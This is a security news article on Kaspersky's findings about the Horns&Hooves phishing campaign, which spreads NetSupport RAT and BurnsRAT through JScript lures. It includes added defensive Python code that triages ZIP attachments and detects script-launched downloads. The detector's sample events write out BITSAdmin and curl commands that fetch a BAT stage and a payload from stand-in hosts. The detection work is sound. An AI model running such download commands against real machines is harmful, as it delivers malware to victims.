Horns&Hooves Campaign Delivers RATs via Fake Emails and JavaScript Payloads

Dec 03, 2024 Ravie Lakshmanan Malware / Phishing Attack

A newly discovered malware campaign has been found to target private users, retailers, and service businesses mainly located in Russia to deliver NetSupport RAT and BurnsRAT.

The campaign, dubbed Horns&Hooves by Kaspersky, has hit more than 1,000 victims since it began around March 2023. The end goal of these attacks is to leverage the access afforded by these trojans to install stealer malware such as Rhadamanthys and Meduza.

“Recent months have seen a surge in mailings with lookalike email attachments in the form of a ZIP archive containing JScript scripts,” security researcher Artem Ushkov said in a Monday analysis. “The script files [are] disguised as requests and bids from potential customers or partners.”

The threat actors behind the operations have demonstrated active development of the JavaScript payload, making significant changes over the course of the campaign.


In some instances, the ZIP archive has been found to contain other documents related to the organization or individual being impersonated, so as to increase the likelihood that the phishing attack succeeds and dupe recipients into opening the malware-laced file.
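The ZIP-with-JScript lure described above can be triaged before it reaches a user. The following is an added example, not code from the article or from Kaspersky: it lists the members of a ZIP attachment that Windows would run as a script and notes when they sit beside ordinary documents, the decoy mix described above. The sample archives, their file names and the extension list are constructed for this example.

```python
import io
import zipfile
from pathlib import PurePosixPath

# Extensions Windows hands to a script host or shell on double-click. The lure
# described above carries JScript (.js); the rest generalise to neighbouring
# script types and are an assumption of this example, not from the article.
SCRIPT_EXTENSIONS = {".js", ".jse", ".wsf", ".vbs", ".vbe", ".hta", ".bat", ".cmd"}


def script_members(zf: zipfile.ZipFile) -> list:
    """Names of archive members Windows would execute as a script."""
    hits = []
    for info in zf.infolist():
        if info.is_dir():
            continue
        # ZIP entries use forward slashes; .suffix keeps only the last
        # extension, so a double-extension lure like "x.pdf.js" is caught.
        if PurePosixPath(info.filename).suffix.lower() in SCRIPT_EXTENSIONS:
            hits.append(info.filename)
    return hits


def triage(zip_bytes: bytes) -> dict:
    """Flag a ZIP attachment that contains a script, and note decoy padding."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        files = [i for i in zf.infolist() if not i.is_dir()]
        scripts = script_members(zf)
    return {
        "members": len(files),
        "scripts": scripts,
        "suspicious": bool(scripts),
        # Script(s) packed next to ordinary documents: the decoy mix the
        # article describes.
        "decoy_mix": bool(scripts) and len(files) > len(scripts),
    }


def build_sample_lure() -> bytes:
    """Constructed 'bid' archive: two decoy documents and one JScript stand-in."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Request_2023/Company_card.pdf", b"%PDF-1.4 decoy")
        zf.writestr("Request_2023/Bank_details.docx", b"PK decoy")
        zf.writestr("Request_2023/Request.pdf.js", b"// constructed stand-in, not a real dropper")
    return buf.getvalue()


def build_sample_clean() -> bytes:
    """Constructed benign archive with a single document."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice.pdf", b"%PDF-1.4 benign")
    return buf.getvalue()


if __name__ == "__main__":
    print(triage(build_sample_lure()))
    print(triage(build_sample_clean()))
```

The check works on member names only, so nested or password-protected archives have to be expanded first, and a mail gateway would normally quarantine on `suspicious` and raise priority on `decoy_mix`.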

One of the earliest samples identified as part of the campaign is an HTML Application (HTA) file that, when run, downloads a decoy PNG image from a remote server using the curl utility for Windows, while also stealthily retrieving and running another script (“bat_install.bat”) from a different server using the BITSAdmin command-line tool.

The newly downloaded script then uses BITSAdmin to fetch several other files, including the NetSupport RAT malware, which establishes contact with a command-and-control (C2) server set up by the attackers.
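The HTA-to-BITSAdmin chain described in the two paragraphs above leaves a characteristic process tree: a script host (mshta.exe here, wscript.exe for the JScript variants) as an ancestor of curl.exe or bitsadmin.exe performing an HTTP transfer. The detection logic below is an added example, not from the article or from Kaspersky. It rebuilds the tree from constructed Sysmon-style process-creation records (a simplified GUID|ParentGUID|Image|CommandLine shape, with hosts under the reserved example.invalid domain) and flags transfers whose ancestry contains a script host, including the BAT-stage BITSAdmin call two hops below mshta.exe, while leaving an administrator's direct BITSAdmin use alone.

```python
from dataclasses import dataclass

# Script hosts that run HTA/JScript lures. The downloaders matched below are
# the two the article names: curl for Windows and BITSAdmin.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}


@dataclass
class Proc:
    guid: str
    parent_guid: str
    image: str
    cmdline: str


def parse_line(line: str) -> Proc:
    """Parse one constructed record: ProcessGuid|ParentProcessGuid|Image|CommandLine."""
    guid, parent_guid, image, cmdline = line.split("|", 3)
    return Proc(guid, parent_guid, image, cmdline)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_remote_transfer(p: Proc) -> bool:
    """True when the process is one of the two LOLBins fetching over HTTP(S)."""
    image, cmd = basename(p.image), p.cmdline.lower()
    if image == "bitsadmin.exe":
        return "/transfer" in cmd and "http" in cmd
    if image == "curl.exe":
        return "http" in cmd
    return False


def ancestry(p: Proc, procs: dict) -> list:
    """Walk parents upward; stop at unknown parents or cycles (GUID reuse)."""
    chain, seen = [], set()
    cur = procs.get(p.parent_guid)
    while cur is not None and cur.guid not in seen:
        seen.add(cur.guid)
        chain.append(basename(cur.image))
        cur = procs.get(cur.parent_guid)
    return chain


def detect(lines: list) -> list:
    """One alert per HTTP transfer whose ancestry contains a script host."""
    procs = {p.guid: p for p in map(parse_line, lines)}
    alerts = []
    for p in procs.values():
        if not is_remote_transfer(p):
            continue
        chain = ancestry(p, procs)
        hosts = [img for img in chain if img in SCRIPT_HOSTS]
        if hosts:
            alerts.append({
                "image": basename(p.image),
                "via": hosts[0],
                "depth": chain.index(hosts[0]) + 1,  # 1 = direct child of the script host
                "cmdline": p.cmdline,
            })
    return alerts


# Constructed sample telemetry modelled on the chain described in the article:
# HTA -> curl (decoy PNG) and BITSAdmin (bat_install.bat), then the BAT stage
# calling BITSAdmin again. The last record is an unrelated admin transfer
# under explorer.exe and must not fire.
SAMPLE_EVENTS = [
    "g1|g0|C:\\Windows\\explorer.exe|explorer.exe",
    "g2|g1|C:\\Windows\\System32\\mshta.exe|mshta.exe C:\\Users\\user\\Downloads\\bid.hta",
    "g3|g2|C:\\Windows\\System32\\curl.exe|curl -s -o %TEMP%\\decoy.png http://cdn.example.invalid/decoy.png",
    "g4|g2|C:\\Windows\\System32\\bitsadmin.exe|bitsadmin /transfer job /download /priority foreground http://dl.example.invalid/bat_install.bat %TEMP%\\bat_install.bat",
    "g5|g2|C:\\Windows\\System32\\cmd.exe|cmd /c %TEMP%\\bat_install.bat",
    "g6|g5|C:\\Windows\\System32\\bitsadmin.exe|bitsadmin /transfer job2 /download http://dl.example.invalid/payload.exe %APPDATA%\\payload.exe",
    "g7|g1|C:\\Windows\\System32\\bitsadmin.exe|bitsadmin /transfer update /download https://updates.example.invalid/patch.msi C:\\Temp\\patch.msi",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Walking the full ancestry rather than checking only the immediate parent is what catches the second BITSAdmin call, which is launched by cmd.exe running bat_install.bat rather than by mshta.exe itself; in production the same logic applies to Sysmon Event ID 1 or Windows 4688 records keyed by ProcessGuid.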


A subsequent iteration of the campaign observed in mid-May 2023 involved the intermediate JavaScript mimicking legitimate JavaScript libraries like Next.js to activate the NetSupport RAT infection chain.

Kaspersky said it also found another variant of the JavaScript file that dropped an NSIS installer that is then responsible for deploying BurnsRAT on the compromised host.

“Although the backdoor supports commands for remotely downloading and running files, as well as various methods of executing commands via the Windows command line, the main task of this component is to start the Remote Manipulator System (RMS) as a service and send the RMS session ID to the attackers’ server,” Ushkov explained.

“RMS is an application that allows users to interact with remote systems over a network. It provides the ability to manage the desktop, execute commands, transfer files and exchange data between devices located in different geographic locations.”


In a sign that the threat actors continued to tweak their modus operandi, two other attack sequences observed in late May and June 2023 came with a completely reworked BAT file for installing NetSupport RAT and incorporated the malware directly within the JavaScript code, respectively.

There are indications that the campaign is the work of a threat actor known as TA569 (aka Gold Prelude, Mustard Tempest, and Purple Vallhund), which is known for operating the SocGholish (aka FakeUpdates) malware. This connection stems from overlaps in the NetSupport RAT license and configuration files used in the respective activities.

It is worth mentioning that TA569 has also been known to act as an initial access broker for follow-on ransomware attacks such as WastedLocker.

“Depending on whose hands this access falls into, the consequences for victim companies can range from data theft to encryption and damage to systems,” Ushkov said. “We also observed attempts to install stealers on some infected machines.”
